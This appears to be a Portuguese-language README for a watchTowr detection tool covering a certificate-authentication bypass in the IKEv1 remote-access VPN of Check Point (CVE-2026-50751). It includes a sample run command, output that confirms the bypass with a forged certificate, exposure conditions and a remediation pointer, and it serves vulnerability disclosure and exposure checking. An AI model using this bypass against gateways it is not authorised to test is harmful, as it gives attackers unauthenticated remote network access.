
Gerador de artefatos de detecção para bypass de autenticação por certificado IKEv1 do Check Point VPN (CVE-2026-50751). Valida a exposição do gateway e demonstra acesso remoto não autenticado via certificados forjados.
Um Gerador de Artefactos de Deteção para a bypass de autenticação por certificado IKEv1 na VPN de Acesso Remoto da Check Point.
https://github.com/user-attachments/assets/1280c545-364e-42d1-94ac-5b2cd850d14e
Consulte nossa publicação no blog para detalhes técnicos.
$ python3 watchTowr-vs-Check-Point-CVE-2026-50751.py -rh vpn.example.com -u watchtowr
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Check-Point-CVE-2026-50751.py
(*) Gerador de Artefactos de Deteção da bypass de autenticação por certificado da VPN de Acesso Remoto IKEv1 da Check Point
- McCaulay (@_mccaulay) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-50751]
[#] CVE-2026-50751 Check Point IKEv1 Remote-Access certificate-auth bypass
[+] Self-signed cert (untrusted); signature will be invalid (no private key)
[#] Connecting via udp ...
[#] Authenticating as 'watchtowr' with the forged certificate + invalid signature...
[#] Decrypting...
[+] Gateway Internal IP: 172.31.255.128
[+] [BYPASSED] Gateway authenticated us as 'watchtowr'. CVE-2026-50751 certificate-authentication bypass confirmed.
Requer Python 3 e o pacote cryptography:
pip install cryptography
Este Gerador de Artefactos de Deteção da watchTowr verifica e demonstra a bypass de autenticação CVE-2026-50751 (CVSS 9.3, CWE-287) na VPN de Acesso Remoto / Mobile Access da Check Point. Um atacante remoto e não autenticado pode concluir a troca legada IKEv1 da fase 1 e ser autenticado como um usuário de Acesso Remoto provisionado sem um certificado válido, chave privada ou senha. Funciona tanto por IKE (UDP 500/4500) quanto pelo Modo Visitante da Check Point / SSL (TCP 443 bruto, TCPT).
Um gateway fica exposto quando é configurado para o caminho legado IKEv1: clientes legados de Acesso Remoto
permitidos, IKEv1 permitido (não apenas IKEv2).
A bypass de autenticação por certificado aplica-se aos métodos de autenticação de usuário Certificate, Certificate with enrollment
e Mixed; o Legacy simples (nome de usuário/senha) não pode ser contornado.
Remediação e mais detalhes podem ser encontrados no advisory e hotfix sk185033 da Check Point:
Para as pesquisas de segurança mais recentes, siga a equipe do watchTowr Labs.